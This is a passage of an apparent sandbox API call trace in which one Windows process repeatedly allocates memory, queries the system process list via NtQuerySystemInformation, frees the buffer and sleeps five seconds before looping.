ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.386] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.403] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.418] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.433] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.450] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.465] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.480] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.496] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.511] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.527] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.543] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.559] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.574] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.589] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.605] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.621] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.637] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.652] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.668] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.683] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.699] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 